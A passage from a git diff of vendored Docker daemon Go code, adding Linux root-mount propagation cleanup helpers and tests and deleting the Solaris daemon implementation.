+	if err := mount.Unmount(daemon.root); err != nil {
+		return err
+	}
+	return os.Remove(unmountFile)
 }
 
 func getCleanPatterns(id string) (regexps []*regexp.Regexp) {
@@ -78,3 +120,14 @@ func getCleanPatterns(id string) (regexps []*regexp.Regexp) {
 	}
 	return
 }
+
+func getRealPath(path string) (string, error) {
+	return fileutils.ReadSymlinkedDirectory(path)
+}
+
+func shouldUnmountRoot(root string, info *mount.Info) bool {
+	if !strings.HasSuffix(root, info.Root) {
+		return false
+	}
+	return hasMountinfoOption(info.Optional, sharedPropagationOption)
+}
diff --git a/vendor/github.com/docker/docker/daemon/daemon_linux_test.go b/vendor/github.com/docker/docker/daemon/daemon_linux_test.go
index c40b13ba4c..767925e2fb 100644
--- a/vendor/github.com/docker/docker/daemon/daemon_linux_test.go
+++ b/vendor/github.com/docker/docker/daemon/daemon_linux_test.go
@@ -1,10 +1,22 @@
 // +build linux
 
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
+	"io/ioutil"
+	"os"
+	"path/filepath"
 	"strings"
 	"testing"
+
+	containertypes "github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/daemon/config"
+	"github.com/docker/docker/oci"
+	"github.com/docker/docker/pkg/idtools"
+	"github.com/docker/docker/pkg/mount"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
 )
 
 const mountsFixture = `142 78 0:38 / / rw,relatime - aufs none rw,si=573b861da0b3a05b,dio
@@ -62,7 +74,7 @@ func TestCleanupMounts(t *testing.T) {
 	d.cleanupMountsFromReaderByID(strings.NewReader(mountsFixture), "", unmount)
 
 	if unmounted != 1 {
-		t.Fatalf("Expected to unmount the shm (and the shm only)")
+		t.Fatal("Expected to unmount the shm (and the shm only)")
 	}
 }
 
@@ -83,7 +95,7 @@ func TestCleanupMountsByID(t *testing.T) {
 	d.cleanupMountsFromReaderByID(strings.NewReader(mountsFixture), "03ca4b49e71f1e49a41108829f4d5c70ac95934526e2af8984a1f65f1de0715d", unmount)
 
 	if unmounted != 1 {
-		t.Fatalf("Expected to unmount the auf root (and that only)")
+		t.Fatal("Expected to unmount the auf root (and that only)")
 	}
 }
 
@@ -99,6 +111,212 @@ func TestNotCleanupMounts(t *testing.T) {
 	mountInfo := `234 232 0:59 / /dev/shm rw,nosuid,nodev,noexec,relatime - tmpfs shm rw,size=65536k`
 	d.cleanupMountsFromReaderByID(strings.NewReader(mountInfo), "", unmount)
 	if unmounted {
-		t.Fatalf("Expected not to clean up /dev/shm")
+		t.Fatal("Expected not to clean up /dev/shm")
+	}
+}
+
+// TestTmpfsDevShmSizeOverride checks that user-specified /dev/tmpfs mount
+// size is not overridden by the default shmsize (that should only be used
+// for default /dev/shm (as in "shareable" and "private" ipc modes).
+// https://github.com/moby/moby/issues/35271
+func TestTmpfsDevShmSizeOverride(t *testing.T) {
+	size := "777m"
+	mnt := "/dev/shm"
+
+	d := Daemon{
+		idMappings: &idtools.IDMappings{},
+	}
+	c := &container.Container{
+		HostConfig: &containertypes.HostConfig{
+			ShmSize: 48 * 1024, // size we should NOT end up with
+		},
+	}
+	ms := []container.Mount{
+		{
+			Source:      "tmpfs",
+			Destination: mnt,
+			Data:        "size=" + size,
+		},
+	}
+
+	// convert ms to spec
+	spec := oci.DefaultSpec()
+	err := setMounts(&d, &spec, c, ms)
+	assert.Check(t, err)
+
+	// Check the resulting spec for the correct size
+	found := false
+	for _, m := range spec.Mounts {
+		if m.Destination == mnt {
+			for _, o := range m.Options {
+				if !strings.HasPrefix(o, "size=") {
+					continue
+				}
+				t.Logf("%+v\n", m.Options)
+				assert.Check(t, is.Equal("size="+size, o))
+				found = true
+			}
+		}
+	}
+	if !found {
+		t.Fatal("/dev/shm not found in spec, or size option missing")
+	}
+}
+
+func TestValidateContainerIsolationLinux(t *testing.T) {
+	d := Daemon{}
+
+	_, err := d.verifyContainerSettings("linux", &containertypes.HostConfig{Isolation: containertypes.IsolationHyperV}, nil, false)
+	assert.Check(t, is.Error(err, "invalid isolation 'hyperv' on linux"))
+}
+
+func TestShouldUnmountRoot(t *testing.T) {
+	for _, test := range []struct {
+		desc   string
+		root   string
+		info   *mount.Info
+		expect bool
+	}{
+		{
+			desc:   "root is at /",
+			root:   "/docker",
+			info:   &mount.Info{Root: "/docker", Mountpoint: "/docker"},
+			expect: true,
+		},
+		{
+			desc:   "root is at in a submount from `/`",
+			root:   "/foo/docker",
+			info:   &mount.Info{Root: "/docker", Mountpoint: "/foo/docker"},
+			expect: true,
+		},
+		{
+			desc:   "root is mounted in from a parent mount namespace same root dir", // dind is an example of this
+			root:   "/docker",
+			info:   &mount.Info{Root: "/docker/volumes/1234657/_data", Mountpoint: "/docker"},
+			expect: false,
+		},
+	} {
+		t.Run(test.desc, func(t *testing.T) {
+			for _, options := range []struct {
+				desc     string
+				Optional string
+				expect   bool
+			}{
+				{desc: "shared", Optional: "shared:", expect: true},
+				{desc: "slave", Optional: "slave:", expect: false},
+				{desc: "private", Optional: "private:", expect: false},
+			} {
+				t.Run(options.desc, func(t *testing.T) {
+					expect := options.expect
+					if expect {
+						expect = test.expect
+					}
+					if test.info != nil {
+						test.info.Optional = options.Optional
+					}
+					assert.Check(t, is.Equal(expect, shouldUnmountRoot(test.root, test.info)))
+				})
+			}
+		})
+	}
+}
+
+func checkMounted(t *testing.T, p string, expect bool) {
+	t.Helper()
+	mounted, err := mount.Mounted(p)
+	assert.Check(t, err)
+	assert.Check(t, mounted == expect, "expected %v, actual %v", expect, mounted)
+}
+
+func TestRootMountCleanup(t *testing.T) {
+	if os.Getuid() != 0 {
+		t.Skip("root required")
 	}
+
+	t.Parallel()
+
+	testRoot, err := ioutil.TempDir("", t.Name())
+	assert.Assert(t, err)
+	defer os.RemoveAll(testRoot)
+	cfg := &config.Config{}
+
+	err = mount.MakePrivate(testRoot)
+	assert.Assert(t, err)
+	defer mount.Unmount(testRoot)
+
+	cfg.ExecRoot = filepath.Join(testRoot, "exec")
+	cfg.Root = filepath.Join(testRoot, "daemon")
+
+	err = os.Mkdir(cfg.ExecRoot, 0755)
+	assert.Assert(t, err)
+	err = os.Mkdir(cfg.Root, 0755)
+	assert.Assert(t, err)
+
+	d := &Daemon{configStore: cfg, root: cfg.Root}
+	unmountFile := getUnmountOnShutdownPath(cfg)
+
+	t.Run("regular dir no mountpoint", func(t *testing.T) {
+		err = setupDaemonRootPropagation(cfg)
+		assert.Assert(t, err)
+		_, err = os.Stat(unmountFile)
+		assert.Assert(t, err)
+		checkMounted(t, cfg.Root, true)
+
+		assert.Assert(t, d.cleanupMounts())
+		checkMounted(t, cfg.Root, false)
+
+		_, err = os.Stat(unmountFile)
+		assert.Assert(t, os.IsNotExist(err))
+	})
+
+	t.Run("root is a private mountpoint", func(t *testing.T) {
+		err = mount.MakePrivate(cfg.Root)
+		assert.Assert(t, err)
+		defer mount.Unmount(cfg.Root)
+
+		err = setupDaemonRootPropagation(cfg)
+		assert.Assert(t, err)
+		assert.Check(t, ensureShared(cfg.Root))
+
+		_, err = os.Stat(unmountFile)
+		assert.Assert(t, os.IsNotExist(err))
+		assert.Assert(t, d.cleanupMounts())
+		checkMounted(t, cfg.Root, true)
+	})
+
+	// mount is pre-configured with a shared mount
+	t.Run("root is a shared mountpoint", func(t *testing.T) {
+		err = mount.MakeShared(cfg.Root)
+		assert.Assert(t, err)
+		defer mount.Unmount(cfg.Root)
+
+		err = setupDaemonRootPropagation(cfg)
+		assert.Assert(t, err)
+
+		if _, err := os.Stat(unmountFile); err == nil {
+			t.Fatal("unmount file should not exist")
+		}
+
+		assert.Assert(t, d.cleanupMounts())
+		checkMounted(t, cfg.Root, true)
+		assert.Assert(t, mount.Unmount(cfg.Root))
+	})
+
+	// does not need mount but unmount file exists from previous run
+	t.Run("old mount file is cleaned up on setup if not needed", func(t *testing.T) {
+		err = mount.MakeShared(testRoot)
+		assert.Assert(t, err)
+		defer mount.MakePrivate(testRoot)
+		err = ioutil.WriteFile(unmountFile, nil, 0644)
+		assert.Assert(t, err)
+
+		err = setupDaemonRootPropagation(cfg)
+		assert.Assert(t, err)
+
+		_, err = os.Stat(unmountFile)
+		assert.Check(t, os.IsNotExist(err), err)
+		checkMounted(t, cfg.Root, false)
+		assert.Assert(t, d.cleanupMounts())
+	})
+
 }
diff --git a/vendor/github.com/docker/docker/daemon/daemon_solaris.go b/vendor/github.com/docker/docker/daemon/daemon_solaris.go
deleted file mode 100644
index 2b4d8d0216..0000000000
--- a/vendor/github.com/docker/docker/daemon/daemon_solaris.go
+++ /dev/null
@@ -1,523 +0,0 @@
-// +build solaris,cgo
-
-package daemon
-
-import (
-	"fmt"
-	"net"
-	"strconv"
-
-	"github.com/Sirupsen/logrus"
-	"github.com/docker/docker/api/types"
-	containertypes "github.com/docker/docker/api/types/container"
-	"github.com/docker/docker/container"
-	"github.com/docker/docker/image"
-	"github.com/docker/docker/layer"
-	"github.com/docker/docker/pkg/idtools"
-	"github.com/docker/docker/pkg/parsers/kernel"
-	"github.com/docker/docker/pkg/sysinfo"
-	"github.com/docker/docker/reference"
-	"github.com/docker/libnetwork"
-	nwconfig "github.com/docker/libnetwork/config"
-	"github.com/docker/libnetwork/drivers/solaris/bridge"
-	"github.com/docker/libnetwork/netlabel"
-	"github.com/docker/libnetwork/netutils"
-	lntypes "github.com/docker/libnetwork/types"
-	"github.com/opencontainers/runc/libcontainer/label"
-	"github.com/opencontainers/runtime-spec/specs-go"
-	"github.com/pkg/errors"
-)
-
-//#include <zone.h>
-import "C"
-
-const (
-	defaultVirtualSwitch = "Virtual Switch"
-	platformSupported    = true
-	solarisMinCPUShares  = 1
-	solarisMaxCPUShares  = 65535
-)
-
-func getMemoryResources(config containertypes.Resources) specs.CappedMemory {
-	memory := specs.CappedMemory{}
-
-	if config.Memory > 0 {
-		memory.Physical = strconv.FormatInt(config.Memory, 10)
-	}
-
-	if config.MemorySwap != 0 {
-		memory.Swap = strconv.FormatInt(config.MemorySwap, 10)
-	}
-
-	return memory
-}
-
-func getCPUResources(config containertypes.Resources) specs.CappedCPU {
-	cpu := specs.CappedCPU{}
-
-	if config.CpusetCpus != "" {
-		cpu.Ncpus = config.CpusetCpus
-	}
-
-	return cpu
-}
-
-func (daemon *Daemon) cleanupMountsByID(id string) error {
-	return nil
-}
-
-func parseSecurityOpt(container *container.Container, config *containertypes.HostConfig) error {
-	//Since config.SecurityOpt is specifically defined as a "List of string values to
-	//customize labels for MLs systems, such as SELinux"
-	//until we figure out how to map to Trusted Extensions
-	//this is being disabled for now on Solaris
-	var (
-		labelOpts []string
-		err       error
-	)
-
-	if len(config.SecurityOpt) > 0 {
-		return errors.New("Security options are not supported on Solaris")
-	}
-
-	container.ProcessLabel, container.MountLabel, err = label.InitLabels(labelOpts)
-	return err
-}
-
-func setupRemappedRoot(config *Config) ([]idtools.IDMap, []idtools.IDMap, error) {
-	return nil, nil, nil
-}
-
-func setupDaemonRoot(config *Config, rootDir string, rootUID, rootGID int) error {
-	return nil
-}
-
-func (daemon *Daemon) getLayerInit() func(string) error {
-	return nil
-}
-
-func checkKernel() error {
-	// solaris can rely upon checkSystem() below, we don't skew kernel versions
-	return nil
-}
-
-func (daemon *Daemon) getCgroupDriver() string {
-	return ""
-}
-
-func (daemon *Daemon) adaptContainerSettings(hostConfig *containertypes.HostConfig, adjustCPUShares bool) error {
-	if hostConfig.CPUShares < 0 {
-		logrus.Warnf("Changing requested CPUShares of %d to minimum allowed of %d", hostConfig.CPUShares, solarisMinCPUShares)
-		hostConfig.CPUShares = solarisMinCPUShares
-	} else if hostConfig.CPUShares > solarisMaxCPUShares {
-		logrus.Warnf("Changing requested CPUShares of %d to maximum allowed of %d", hostConfig.CPUShares, solarisMaxCPUShares)
-		hostConfig.CPUShares = solarisMaxCPUShares
-	}
-
-	if hostConfig.Memory > 0 && hostConfig.MemorySwap == 0 {
-		// By default, MemorySwap is set to twice the size of Memory.
-		hostConfig.MemorySwap = hostConfig.Memory * 2
-	}
-
-	if hostConfig.ShmSize != 0 {
-		hostConfig.ShmSize = container.DefaultSHMSize
-	}
-	if hostConfig.OomKillDisable == nil {
-		defaultOomKillDisable := false
-		hostConfig.OomKillDisable = &defaultOomKillDisable
-	}
-
-	return nil
-}
-
-// UsingSystemd returns true if cli option includes native.cgroupdriver=systemd
-func UsingSystemd(config *Config) bool {
-	return false
-}
-
-// verifyPlatformContainerSettings performs platform-specific validation of the
-// hostconfig and config structures.
-func verifyPlatformContainerSettings(daemon *Daemon, hostConfig *containertypes.HostConfig, config *containertypes.Config, update bool) ([]string, error) {
-	warnings := []string{}
-	sysInfo := sysinfo.New(true)
-	// NOTE: We do not enforce a minimum value for swap limits for zones on Solaris and
-	// therefore we will not do that for Docker container either.
-	if hostConfig.Memory > 0 && !sysInfo.MemoryLimit {
-		warnings = append(warnings, "Your kernel does not support memory limit capabilities. Limitation discarded.")
-		logrus.Warnf("Your kernel does not support memory limit capabilities. Limitation discarded.")
-		hostConfig.Memory = 0
-		hostConfig.MemorySwap = -1
-	}
-	if hostConfig.Memory > 0 && hostConfig.MemorySwap != -1 && !sysInfo.SwapLimit {
-		warnings = append(warnings, "Your kernel does not support swap limit capabilities, memory limited without swap.")
-		logrus.Warnf("Your kernel does not support swap limit capabilities, memory limited without swap.")
-		hostConfig.MemorySwap = -1
-	}
-	if hostConfig.Memory > 0 && hostConfig.MemorySwap > 0 && hostConfig.MemorySwap < hostConfig.Memory {
-		return warnings, fmt.Errorf("Minimum memoryswap limit should be larger than memory limit, see usage.")
-	}
-	// Solaris NOTE: We allow and encourage setting the swap without setting the memory limit.
-
-	if hostConfig.MemorySwappiness != nil && *hostConfig.MemorySwappiness != -1 && !sysInfo.MemorySwappiness {
-		warnings = append(warnings, "Your kernel does not support memory swappiness capabilities, memory swappiness discarded.")
-		logrus.Warnf("Your kernel does not support memory swappiness capabilities, memory swappiness discarded.")
-		hostConfig.MemorySwappiness = nil
-	}
-	if hostConfig.MemoryReservation > 0 && !sysInfo.MemoryReservation {
-		warnings = append(warnings, "Your kernel does not support memory soft limit capabilities. Limitation discarded.")
-		logrus.Warnf("Your kernel does not support memory soft limit capabilities. Limitation discarded.")
-		hostConfig.MemoryReservation = 0
-	}
-	if hostConfig.Memory > 0 && hostConfig.MemoryReservation > 0 && hostConfig.Memory < hostConfig.MemoryReservation {
-		return warnings, fmt.Errorf("Minimum memory limit should be larger than memory reservation limit, see usage.")
-	}
-	if hostConfig.KernelMemory > 0 && !sysInfo.KernelMemory {
-		warnings = append(warnings, "Your kernel does not support kernel memory limit capabilities. Limitation discarded.")
-		logrus.Warnf("Your kernel does not support kernel memory limit capabilities. Limitation discarded.")
-		hostConfig.KernelMemory = 0
-	}
-	if hostConfig.CPUShares != 0 && !sysInfo.CPUShares {
-		warnings = append(warnings, "Your kernel does not support CPU shares. Shares discarded.")
-		logrus.Warnf("Your kernel does not support CPU shares. Shares discarded.")
-		hostConfig.CPUShares = 0
-	}
-	if hostConfig.CPUShares < 0 {
-		warnings = append(warnings, "Invalid CPUShares value. Must be positive. Discarding.")
-		logrus.Warnf("Invalid CPUShares value. Must be positive. Discarding.")
-		hostConfig.CPUQuota = 0
-	}
-	if hostConfig.CPUShares > 0 && !sysinfo.IsCPUSharesAvailable() {
-		warnings = append(warnings, "Global zone default scheduling class not FSS. Discarding shares.")
-		logrus.Warnf("Global zone default scheduling class not FSS. Discarding shares.")
-		hostConfig.CPUShares = 0
-	}
-
-	// Solaris NOTE: Linux does not do negative checking for CPUShares and Quota here. But it makes sense to.
-	if hostConfig.CPUPeriod > 0 && !sysInfo.CPUCfsPeriod {
-		warnings = append(warnings, "Your kernel does not support CPU cfs period. Period discarded.")
-		logrus.Warnf("Your kernel does not support CPU cfs period. Period discarded.")
-		if hostConfig.CPUQuota > 0 {
-			warnings = append(warnings, "Quota will be applied on default period, not period specified.")
-			logrus.Warnf("Quota will be applied on default period, not period specified.")
-		}
-		hostConfig.CPUPeriod = 0
-	}
-	if hostConfig.CPUQuota != 0 && !sysInfo.CPUCfsQuota {
-		warnings = append(warnings, "Your kernel does not support CPU cfs quota. Quota discarded.")
-		logrus.Warnf("Your kernel does not support CPU cfs quota. Quota discarded.")
-		hostConfig.CPUQuota = 0
-	}
-	if hostConfig.CPUQuota < 0 {
-		warnings = append(warnings, "Invalid CPUQuota value. Must be positive. Discarding.")
-		logrus.Warnf("Invalid CPUQuota value. Must be positive. Discarding.")
-		hostConfig.CPUQuota = 0
-	}
-	if (hostConfig.CpusetCpus != "" || hostConfig.CpusetMems != "") && !sysInfo.Cpuset {
-		warnings = append(warnings, "Your kernel does not support cpuset. Cpuset discarded.")
-		logrus.Warnf("Your kernel does not support cpuset. Cpuset discarded.")
-		hostConfig.CpusetCpus = ""
-		hostConfig.CpusetMems = ""
-	}
-	cpusAvailable, err := sysInfo.IsCpusetCpusAvailable(hostConfig.CpusetCpus)
-	if err != nil {
-		return warnings, fmt.Errorf("Invalid value %s for cpuset cpus.", hostConfig.CpusetCpus)
-	}
-	if !cpusAvailable {
-		return warnings, fmt.Errorf("Requested CPUs are not available - requested %s, available: %s.", hostConfig.CpusetCpus, sysInfo.Cpus)
-	}
-	memsAvailable, err := sysInfo.IsCpusetMemsAvailable(hostConfig.CpusetMems)
-	if err != nil {
-		return warnings, fmt.Errorf("Invalid value %s for cpuset mems.", hostConfig.CpusetMems)
-	}
-	if !memsAvailable {
-		return warnings, fmt.Errorf("Requested memory nodes are not available - requested %s, available: %s.", hostConfig.CpusetMems, sysInfo.Mems)
-	}
-	if hostConfig.BlkioWeight > 0 && !sysInfo.BlkioWeight {
-		warnings = append(warnings, "Your kernel does not support Block I/O weight. Weight discarded.")
-		logrus.Warnf("Your kernel does not support Block I/O weight. Weight discarded.")
-		hostConfig.BlkioWeight = 0
-	}
-	if hostConfig.OomKillDisable != nil && !sysInfo.OomKillDisable {
-		*hostConfig.OomKillDisable = false
-		// Don't warn; this is the default setting but only applicable to Linux
-	}
-
-	if sysInfo.IPv4ForwardingDisabled {
-		warnings = append(warnings, "IPv4 forwarding is disabled. Networking will not work.")
-		logrus.Warnf("IPv4 forwarding is disabled. Networking will not work")
-	}
-
-	// Solaris NOTE: We do not allow setting Linux specific options, so check and warn for all of them.
-
-	if hostConfig.CapAdd != nil || hostConfig.CapDrop != nil {
-		warnings = append(warnings, "Adding or dropping kernel capabilities unsupported on Solaris.Discarding capabilities lists.")
-		logrus.Warnf("Adding or dropping kernel capabilities unsupported on Solaris.Discarding capabilities lists.")
-		hostConfig.CapAdd = nil
-		hostConfig.CapDrop = nil
-	}
-
-	if hostConfig.GroupAdd != nil {
-		warnings = append(warnings, "Additional groups unsupported on Solaris.Discarding groups lists.")
-		logrus.Warnf("Additional groups unsupported on Solaris.Discarding groups lists.")
-		hostConfig.GroupAdd = nil
-	}
-
-	if hostConfig.IpcMode != "" {
-		warnings = append(warnings, "IPC namespace assignment unsupported on Solaris.Discarding IPC setting.")
-		logrus.Warnf("IPC namespace assignment unsupported on Solaris.Discarding IPC setting.")
-		hostConfig.IpcMode = ""
-	}
-
-	if hostConfig.PidMode != "" {
-		warnings = append(warnings, "PID namespace setting  unsupported on Solaris. Running container in host PID namespace.")
-		logrus.Warnf("PID namespace setting  unsupported on Solaris. Running container in host PID namespace.")
-		hostConfig.PidMode = ""
-	}
-
-	if hostConfig.Privileged {
-		warnings = append(warnings, "Privileged mode unsupported on Solaris. Discarding privileged mode setting.")
-		logrus.Warnf("Privileged mode unsupported on Solaris. Discarding privileged mode setting.")
-		hostConfig.Privileged = false
-	}
-
-	if hostConfig.UTSMode != "" {
-		warnings = append(warnings, "UTS namespace assignment unsupported on Solaris.Discarding UTS setting.")
-		logrus.Warnf("UTS namespace assignment unsupported on Solaris.Discarding UTS setting.")
-		hostConfig.UTSMode = ""
-	}
-
-	if hostConfig.CgroupParent != "" {
-		warnings = append(warnings, "Specifying Cgroup parent unsupported on Solaris. Discarding cgroup parent setting.")
-		logrus.Warnf("Specifying Cgroup parent unsupported on Solaris. Discarding cgroup parent setting.")
-		hostConfig.CgroupParent = ""
-	}
-
-	if hostConfig.Ulimits != nil {
-		warnings = append(warnings, "Specifying ulimits unsupported on Solaris. Discarding ulimits setting.")
-		logrus.Warnf("Specifying ulimits unsupported on Solaris. Discarding ulimits setting.")
-		hostConfig.Ulimits = nil
-	}
-
-	return warnings, nil
-}
-
-// platformReload update configuration with platform specific options
-func (daemon *Daemon) platformReload(config *Config) map[string]string {
-	return map[string]string{}
-}
-
-// verifyDaemonSettings performs validation of daemon config struct
-func verifyDaemonSettings(config *Config) error {
-
-	if config.DefaultRuntime == "" {
-		config.DefaultRuntime = stockRuntimeName
-	}
-	if config.Runtimes == nil {
-		config.Runtimes = make(map[string]types.Runtime)
-	}
-	stockRuntimeOpts := []string{}
-	config.Runtimes[stockRuntimeName] = types.Runtime{Path: DefaultRuntimeBinary, Args: stockRuntimeOpts}
-
-	// checkSystem validates platform-specific requirements
-	return nil
-}
-
-func checkSystem() error {
-	// check OS version for compatibility, ensure running in global zone
-	var err error
-	var id C.zoneid_t
-
-	if id, err = C.getzoneid(); err != nil {
-		return fmt.Errorf("Exiting. Error getting zone id: %+v", err)
-	}
-	if int(id) != 0 {
-		return fmt.Errorf("Exiting because the Docker daemon is not running in the global zone")
-	}
-
-	v, err := kernel.GetKernelVersion()
-	if kernel.CompareKernelVersion(*v, kernel.VersionInfo{Kernel: 5, Major: 12, Minor: 0}) < 0 {
-		return fmt.Errorf("Your Solaris kernel version: %s doesn't support Docker. Please upgrade to 5.12.0", v.String())
-	}
-	return err
-}
-
-// configureMaxThreads sets the Go runtime max threads threshold
-// which is 90% of the kernel setting from /proc/sys/kernel/threads-max
-func configureMaxThreads(config *Config) error {
-	return nil
-}
-
-// configureKernelSecuritySupport configures and validate security support for the kernel
-func configureKernelSecuritySupport(config *Config, driverName string) error {
-	return nil
-}
-
-func (daemon *Daemon) initNetworkController(config *Config, activeSandboxes map[string]interface{}) (libnetwork.NetworkController, error) {
-	netOptions, err := daemon.networkOptions(config, daemon.PluginStore, activeSandboxes)
-	if err != nil {
-		return nil, err
-	}
-
-	controller, err := libnetwork.New(netOptions...)
-	if err != nil {
-		return nil, fmt.Errorf("error obtaining controller instance: %v", err)
-	}
-
-	// Initialize default network on "null"
-	if _, err := controller.NewNetwork("null", "none", "", libnetwork.NetworkOptionPersist(false)); err != nil {
-		return nil, fmt.Errorf("Error creating default 'null' network: %v", err)
-	}
-
-	if !config.DisableBridge {
-		// Initialize default driver "bridge"
-		if err := initBridgeDriver(controller, config); err != nil {
-			return nil, err
-		}
-	}
-
-	return controller, nil
-}
-
-func initBridgeDriver(controller libnetwork.NetworkController, config *Config) error {
-	if n, err := controller.NetworkByName("bridge"); err == nil {
-		if err = n.Delete(); err != nil {
-			return fmt.Errorf("could not delete the default bridge network: %v", err)
-		}
-	}
-
-	bridgeName := bridge.DefaultBridgeName
-	if config.bridgeConfig.Iface != "" {
-		bridgeName = config.bridgeConfig.Iface
-	}
-	netOption := map[string]string{
-		bridge.BridgeName:    bridgeName,
-		bridge.DefaultBridge: strconv.FormatBool(true),
-		netlabel.DriverMTU:   strconv.Itoa(config.Mtu),
-		bridge.EnableICC:     strconv.FormatBool(config.bridgeConfig.InterContainerCommunication),
-	}
-
-	// --ip processing
-	if config.bridgeConfig.DefaultIP != nil {
-		netOption[bridge.DefaultBindingIP] = config.bridgeConfig.DefaultIP.String()
-	}
-
-	var ipamV4Conf *libnetwork.IpamConf
-
-	ipamV4Conf = &libnetwork.IpamConf{AuxAddresses: make(map[string]string)}
-
-	nwList, _, err := netutils.ElectInterfaceAddresses(bridgeName)
-	if err != nil {
-		return errors.Wrap(err, "list bridge addresses failed")
-	}
-
-	nw := nwList[0]
-	if len(nwList) > 1 && config.bridgeConfig.FixedCIDR != "" {
-		_, fCIDR, err := net.ParseCIDR(config.bridgeConfig.FixedCIDR)
-		if err != nil {
-			return errors.Wrap(err, "parse CIDR failed")
-		}
-		// Iterate through in case there are multiple addresses for the bridge
-		for _, entry := range nwList {
-			if fCIDR.Contains(entry.IP) {
-				nw = entry
-				break
-			}
-		}
-	}
-
-	ipamV4Conf.PreferredPool = lntypes.GetIPNetCanonical(nw).String()
-	hip, _ := lntypes.GetHostPartIP(nw.IP, nw.Mask)
-	if hip.IsGlobalUnicast() {
-		ipamV4Conf.Gateway = nw.IP.String()
-	}
-
-	if config.bridgeConfig.IP != "" {
-		ipamV4Conf.PreferredPool = config.bridgeConfig.IP
-		ip, _, err := net.ParseCIDR(config.bridgeConfig.IP)
-		if err != nil {
-			return err
-		}
-		ipamV4Conf.Gateway = ip.String()
-	} else if bridgeName == bridge.DefaultBridgeName && ipamV4Conf.PreferredPool != "" {
-		logrus.Infof("Default bridge (%s) is assigned with an IP address %s. Daemon option --bip can be used to set a preferred IP address", bridgeName, ipamV4Conf.PreferredPool)
-	}
-
-	if config.bridgeConfig.FixedCIDR != "" {
-		_, fCIDR, err := net.ParseCIDR(config.bridgeConfig.FixedCIDR)
-		if err != nil {
-			return err
-		}
-
-		ipamV4Conf.SubPool = fCIDR.String()
-	}
-
-	if config.bridgeConfig.DefaultGatewayIPv4 != nil {
-		ipamV4Conf.AuxAddresses["DefaultGatewayIPv4"] = config.bridgeConfig.DefaultGatewayIPv4.String()
-	}
-
-	v4Conf := []*libnetwork.IpamConf{ipamV4Conf}
-	v6Conf := []*libnetwork.IpamConf{}
-
-	// Initialize default network on "bridge" with the same name
-	_, err = controller.NewNetwork("bridge", "bridge", "",
-		libnetwork.NetworkOptionDriverOpts(netOption),
-		libnetwork.NetworkOptionIpam("default", "", v4Conf, v6Conf, nil),
-		libnetwork.NetworkOptionDeferIPv6Alloc(false))
-	if err != nil {
-		return fmt.Errorf("Error creating default 'bridge' network: %v", err)
-	}
-	return nil
-}
-
-// registerLinks sets up links between containers and writes the
-// configuration out for persistence.
-func (daemon *Daemon) registerLinks(container *container.Container, hostConfig *containertypes.HostConfig) error {
-	return nil
-}
-
-func (daemon *Daemon) cleanupMounts() error {
-	return nil
-}
-
-// conditionalMountOnStart is a platform specific helper function during the
-// container start to call mount.
-func (daemon *Daemon) conditionalMountOnStart(container *container.Container) error {
-	return daemon.Mount(container)
-}
-
-// conditionalUnmountOnCleanup is a platform specific helper function called
-// during the cleanup of a container to unmount.
-func (daemon *Daemon) conditionalUnmountOnCleanup(container *container.Container) error {
-	return daemon.Unmount(container)
-}
-
-func restoreCustomImage(is image.Store, ls layer.Store, rs reference.Store) error {
-	// Solaris has no custom images to register
-	return nil
-}
-
-func driverOptions(config *Config) []nwconfig.Option {
-	return []nwconfig.Option{}
-}
-
-func (daemon *Daemon) stats(c *container.Container) (*types.StatsJSON, error) {
-	return nil, nil
-}
-
-// setDefaultIsolation determine the default isolation mode for the
-// daemon to run in. This is only applicable on Windows
-func (daemon *Daemon) setDefaultIsolation() error {
-	return nil
-}
-
-func rootFSToAPIType(rootfs *image.RootFS) types.RootFS {
-	return types.RootFS{}
-}
-
-func setupDaemonProcess(config *Config) error {
-	return nil
-}
-
-func (daemon *Daemon) setupSeccompProfile() error {
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/daemon/daemon_test.go b/vendor/github.com/docker/docker/daemon/daemon_test.go
index 00817bd1b6..43f4f504b6 100644
--- a/vendor/github.com/docker/docker/daemon/daemon_test.go
+++ b/vendor/github.com/docker/docker/daemon/daemon_test.go
@@ -1,27 +1,24 @@
-// +build !solaris
-
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
 	"io/ioutil"
 	"os"
 	"path/filepath"
-	"reflect"
+	"runtime"
 	"testing"
-	"time"
 
 	containertypes "github.com/docker/docker/api/types/container"
 	"github.com/docker/docker/container"
-	"github.com/docker/docker/pkg/discovery"
+	"github.com/docker/docker/errdefs"
 	_ "github.com/docker/docker/pkg/discovery/memory"
-	"github.com/docker/docker/pkg/registrar"
+	"github.com/docker/docker/pkg/idtools"
 	"github.com/docker/docker/pkg/truncindex"
-	"github.com/docker/docker/registry"
-	"github.com/docker/docker/volume"
-	volumedrivers "github.com/docker/docker/volume/drivers"
-	"github.com/docker/docker/volume/local"
-	"github.com/docker/docker/volume/store"
+	volumesservice "github.com/docker/docker/volume/service"
 	"github.com/docker/go-connections/nat"
+	"github.com/docker/libnetwork"
+	"github.com/pkg/errors"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
 )
 
 //
@@ -30,38 +27,28 @@ import (
 
 func TestGetContainer(t *testing.T) {
 	c1 := &container.Container{
-		CommonContainer: container.CommonContainer{
-			ID:   "5a4ff6a163ad4533d22d69a2b8960bf7fafdcba06e72d2febdba229008b0bf57",
-			Name: "tender_bardeen",
-		},
+		ID:   "5a4ff6a163ad4533d22d69a2b8960bf7fafdcba06e72d2febdba229008b0bf57",
+		Name: "tender_bardeen",
 	}
 
 	c2 := &container.Container{
-		CommonContainer: container.CommonContainer{
-			ID:   "3cdbd1aa394fd68559fd1441d6eff2ab7c1e6363582c82febfaa8045df3bd8de",
-			Name: "drunk_hawking",
-		},
+		ID:   "3cdbd1aa394fd68559fd1441d6eff2ab7c1e6363582c82febfaa8045df3bd8de",
+		Name: "drunk_hawking",
 	}
 
 	c3 := &container.Container{
-		CommonContainer: container.CommonContainer{
-			ID:   "3cdbd1aa394fd68559fd1441d6eff2abfafdcba06e72d2febdba229008b0bf57",
-			Name: "3cdbd1aa",
-		},
+		ID:   "3cdbd1aa394fd68559fd1441d6eff2abfafdcba06e72d2febdba229008b0bf57",
+		Name: "3cdbd1aa",
 	}
 
 	c4 := &container.Container{
-		CommonContainer: container.CommonContainer{
